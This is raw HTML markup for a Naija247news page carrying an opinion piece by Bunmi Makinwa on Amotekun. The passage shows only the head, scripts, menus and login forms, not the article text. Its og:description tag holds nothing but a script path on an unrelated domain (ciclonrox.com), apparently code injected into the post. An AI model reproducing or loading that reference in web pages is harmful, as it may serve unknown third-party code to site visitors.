<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-ZA"> <!--<![endif]-->
<head>
    <title>The Real Amotekun Is Yet Ahead, By Bunmi Makinwa | Naija247news</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://naija247news.com/xmlrpc.php" />
    <!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="uw2qPv_daOnUudnLcO6hjVitB8h5oyN0ua07c8ir0ws" />
<meta property="og:image" content="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?fit=225%2C225&ssl=1" /><meta name="author" content="Naija247news Media">
<link rel="icon" type="image/png" href="http://naija247news.com/wp-content/uploads/2018/12/InstaLogo.jpg"><link rel="apple-touch-icon-precomposed" sizes="76x76" href="http://naija247news.com/wp-content/uploads/2018/01/logonaija247news.jpeg"/><link rel="apple-touch-icon-precomposed" sizes="120x120" href="http://naija247news.com/wp-content/uploads/2018/01/logonaija247news.jpeg"/><link rel="apple-touch-icon-precomposed" sizes="152x152" href="http://naija247news.com/wp-content/uploads/2018/01/logonaija247news.jpeg"/><link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://naija247news.com/wp-content/uploads/2018/01/logonaija247news.jpeg"/><link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://naija247news.com/wp-content/uploads/2018/01/logonaija247news.jpeg"/><link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Naija247news &raquo; Feed" href="https://naija247news.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Naija247news &raquo; Comments Feed" href="https://naija247news.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Naija247news &raquo; The Real Amotekun Is Yet Ahead, By Bunmi Makinwa Comments Feed" href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/naija247news.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://c0.wp.com/c/5.3.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link crossorigin="anonymous" rel='stylesheet' id='google_font_open_sans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=5.3.2' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='google_font_roboto-css'  href='https://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C900%2C500italic%2C400%2C300&#038;ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='https://naija247news.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://naija247news.com/wp-content/themes/Newspaper/style.css?ver=7.6' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://c0.wp.com/p/jetpack/8.1.1/_inc/social-logos/social-logos.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://c0.wp.com/p/jetpack/8.1.1/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' src='https://c0.wp.com/c/5.3.2/wp-includes/js/jquery/jquery.js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.3.2/wp-includes/js/jquery/jquery-migrate.min.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/8.1.1/_inc/build/related-posts/related-posts.min.js'></script>
<link rel='https://api.w.org/' href='https://naija247news.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://naija247news.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://naija247news.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='For Our Departed Revolutionary Idealists, By Edwin Madunagu' href='https://naija247news.com/2020/01/25/for-our-departed-revolutionary-idealists-by-edwin-madunagu/' />
<link rel='next' title='Buhari and Electoral Reform: The Unspoken Truth, By SKC Ogbonnia' href='https://naija247news.com/2020/01/25/buhari-and-electoral-reform-the-unspoken-truth-by-skc-ogbonnia/' />
<meta name="generator" content="WordPress 5.3.2" />
<link rel="canonical" href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" />
<link rel='shortlink' href='https://wp.me/p8hW8j-1j7m' />
<link rel="alternate" type="application/json+oembed" href="https://naija247news.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://naija247news.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F&#038;format=xml" />
				<meta property="ia:markup_url" content="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/?ia_markup=1" />
				
<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<link rel='dns-prefetch' href='//widgets.wp.com'/>
<link rel='dns-prefetch' href='//s0.wp.com'/>
<link rel='dns-prefetch' href='//0.gravatar.com'/>
<link rel='dns-prefetch' href='//1.gravatar.com'/>
<link rel='dns-prefetch' href='//2.gravatar.com'/>
<link rel='dns-prefetch' href='//c0.wp.com'/>
<link rel='dns-prefetch' href='//i0.wp.com'/>
<link rel='dns-prefetch' href='//i1.wp.com'/>
<link rel='dns-prefetch' href='//i2.wp.com'/>
<link rel='dns-prefetch' href='//jetpack.wordpress.com'/>
<link rel='dns-prefetch' href='//s1.wp.com'/>
<link rel='dns-prefetch' href='//s2.wp.com'/>
<link rel='dns-prefetch' href='//public-api.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <link rel="alternate" type="application/rss+xml" title="Stories" href="https://naija247news.com/feed/?post_type=amp_story"><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://naija247news.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><link rel="amphtml" href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="The Real Amotekun Is Yet Ahead, By Bunmi Makinwa" />
<meta property="og:url" content="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" />
<meta property="og:description" content="&nbsp; //ciclonrox.com/21d4a10d5bc3d00d52.js" />
<meta property="article:published_time" content="2020-01-25T17:29:20+00:00" />
<meta property="article:modified_time" content="2020-01-25T17:29:20+00:00" />
<meta property="og:site_name" content="Naija247news" />
<meta property="og:image" content="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?fit=225%2C225&amp;ssl=1" />
<meta property="og:image:width" content="225" />
<meta property="og:image:height" content="225" />
<meta name="twitter:creator" content="@Naija247new" />
<meta name="twitter:site" content="@naija247new" />
<meta name="twitter:text:title" content="The Real Amotekun Is Yet Ahead, By Bunmi Makinwa" />
<meta name="twitter:image" content="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?fit=225%2C225&#038;ssl=1&#038;w=1400" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->

<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var tds_login_sing_in_widget="show";
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var tds_general_modal_image="yes";
var td_ajax_url="https:\/\/naija247news.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=7.6";
var td_get_template_directory_uri="https:\/\/naija247news.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="show_header_logo";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="show";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#2eba00";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>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</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-19102240-1', 'auto');
  ga('send', 'pageview');

</script><link rel="icon" href="https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/cropped-InstaLogo.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/cropped-InstaLogo.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/cropped-InstaLogo.jpg?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i1.wp.com/naija247news.com/wp-content/uploads/2018/12/cropped-InstaLogo.jpg?fit=270%2C270&#038;ssl=1" />
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>	<script data-ad-client="ca-pub-6874945212263678" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
	<script src="https://clientcdn.pushengage.com/core/4371920ae0d0cf30e1858eb12a72defa.js"></script>
<script> _pe.subscribe(); </script>
</head>
<meta property="fb:pages" content="183141575431671" />
<body class="post-template-default single single-post postid-311820 single-format-standard the-real-amotekun-is-yet-ahead-by-bunmi-makinwa wpb-js-composer js-comp-ver-5.0.1 vc_responsive td-animation-stack-type0 td-boxed-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/naija247news/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/naija247news/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.linkedin.com/company/naija247news" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://godwin12345.tumblr.com/" title="Path">
                <i class="td-icon-font td-icon-path"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://feeds.feedburner.com/naija247news/ASsy" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://godwin12345.tumblr.com/" title="Tumblr">
                <i class="td-icon-font td-icon-tumblr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/naija247new" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
                    <div class="td-menu-login-section">
                
    <div class="td-guest-wrap">
        <div class="td-menu-avatar"><div class="td-avatar-container"></div></div>
        <div class="td-menu-login"><a id="login-link-mob">Sign in</a> <span></span><a id="register-link-mob">Join</a></div>
    </div>
            </div>
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-main-container"><ul id="menu-main" class="td-mobile-main-menu"><li id="menu-item-212408" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first menu-item-212408"><a href="http://naija247news.com/">Home</a></li>
<li id="menu-item-11" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://naija247news.com/category/national/">National</a></li>
<li id="menu-item-7" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-7"><a href="https://naija247news.com/category/business/">Business<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><a href="https://naija247news.com/category/business/branding-news/">Branding News</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/business/entrepreneurs/">Entrepreneurs</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/business/news-business/">News</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/business/report/">Report</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/business/start-ups/">Start-ups</a></li>
</ul>
</li>
<li id="menu-item-290048" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-290048"><a href="https://naija247news.com/category/companies/">Companies</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8"><a href="https://naija247news.com/category/economy/">Economy<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/agriculture/">Agriculture</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/analysis/">Analysis</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/banking-institutions/">Banking Institutions</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/economic-indicators/">Economic Indicators</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/eurobond/">EuroBond</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/infrastructure/">Infrastructure</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/infrastructure/investing-infrastructure/">Investing</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/infrastructure/pension-retirement/">Pension &amp; Retirement</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/infrastructure/power-infrastructure/">Power</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/infrastructure/real-estate/">Real Estate</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/infrastructure/road/">Road</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/insurance-economy/">Insurance</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/manufacturing/">Manufacturing</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/maritime/">Maritime</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/mining/">Mining</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/revenue/">Revenue</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/economy/tourism/">Tourism</a></li>
</ul>
</li>
<li id="menu-item-214566" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-214566"><a href="https://naija247news.com/category/markets-2/">Markets<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/african-exchanges/">African Exchanges</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/asia-stock-exchange/">Asia Stock Exchange</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/capital-markets/">Capital Markets</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/emerging-markets/">Emerging Markets</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/london-stock-exchange/">London Stock Exchange</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/new-york-stock-exchange/">New York Stock Exchange</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/markets-2/nigeria-stock-exchange/">Nigeria Stock Exchange</a></li>
</ul>
</li>
<li id="menu-item-214550" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-214550"><a href="https://naija247news.com/category/oil-energy/">Energy<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/analysis-oil-gas/">Analysis</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/ceraweek2018/">CERAWeek2018</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/investing/">Investing</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/news/">News</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/opec/">OPEC</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/power/">Power</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/renewal-energy/">Renewal Energy</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/oil-energy/shale-oil/">Shale Oil</a></li>
</ul>
</li>
<li id="menu-item-290046" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-290046"><a href="https://naija247news.com/category/politics/">Politics</a></li>
<li id="menu-item-13" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-13"><a href="https://naija247news.com/category/world/">World<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/africa/">Africa</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/africa/economy-africa/">Economy</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/africa/investing-africa/">Investing</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/africa/markets-africa/">Markets</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/africa/politics-africa/">Politics</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/americas/">Americas</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/americas/u-s/">U.S</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/analysis-world/">Analysis</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/asia/">Asia</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/europe/">Europe</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/europe/brexit/">Brexit</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/europe/catalonia/">Catalonia</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/europe/frexit/">Frexit</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/global-politics/">Global Politics</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/markets/">Markets</a></li>
	<li class="menu-item-0"><a href="https://naija247news.com/category/world/middleeast/">MiddleEast</a></li>
</ul>
</li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
            <div id="login-form-mobile" class="td-register-section">
            
            <div id="td-login-mob" class="td-login-animation td-login-hide-mob">
            	<!-- close button -->
	            <div class="td-login-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Sign in</div>
	                <!-- close button -->
		            <div class="td-mobile-close">
		                <a href="#"><i class="td-icon-close-mobile"></i></a>
		            </div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title"><span>Welcome!</span>Log into your account</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email-mob" value="" required><label>your username</label></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass-mob" value="" required><label>your password</label></div>
	                <input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="LOG IN">
	                <div class="td-login-info-text"><a href="#" id="forgot-pass-link-mob">Forgot your password?</a></div>
                </div>
            </div>

            
            <div id="td-register-mob" class="td-login-animation td-login-hide-mob">
            	<!-- close button -->
	            <div class="td-register-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Sign up</div>
	                <!-- close button -->
		            <div class="td-mobile-close">
		                <a href="#"><i class="td-icon-close-mobile"></i></a>
		            </div>
	            </div>
            	<div class="td-login-panel-title"><span>Welcome!</span>Register for an account</div>
                <div class="td-login-form-wrap">
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="register_email" id="register_email-mob" value="" required><label>your email</label></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="register_user" id="register_user-mob" value="" required><label>your username</label></div>
	                <input type="button" name="register_button" id="register_button-mob" class="td-login-button" value="REGISTER">
	                <div class="td-login-info-text">A password will be e-mailed to you.</div>
                </div>
            </div>

            <div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">
                <!-- close button -->
	            <div class="td-forgot-pass-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Password recovery</div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title">Recover your password</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label>your email</label></div>
	                <input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Send My Pass">
                </div>
            </div>
        </div>
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="https://naija247news.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap">
    
        <!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	<!-- td weather source: cache -->		<div class="td-weather-top-widget" id="td_top_weather_uid">
			<i class="td-icons broken-clouds-n"></i>
			<div class="td-weather-now" data-block-uid="td_top_weather_uid">
				<span class="td-big-degrees">22.7</span>
				<span class="td-weather-unit">C</span>
			</div>
			<div class="td-weather-header">
				<div class="td-weather-city">Lagos, South Africa and New York</div>
			</div>
		</div>
		        <div class="td_data_time">
            <div >

                Sat, Jan 25, 2020
            </div>
        </div>
    <ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Sign in / Join</a><span class="td-sp-ico-login td_sp_login_ico_style"></span></li></ul></div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/naija247news/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/naija247news/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.linkedin.com/company/naija247news" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://godwin12345.tumblr.com/" title="Path">
                <i class="td-icon-font td-icon-path"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
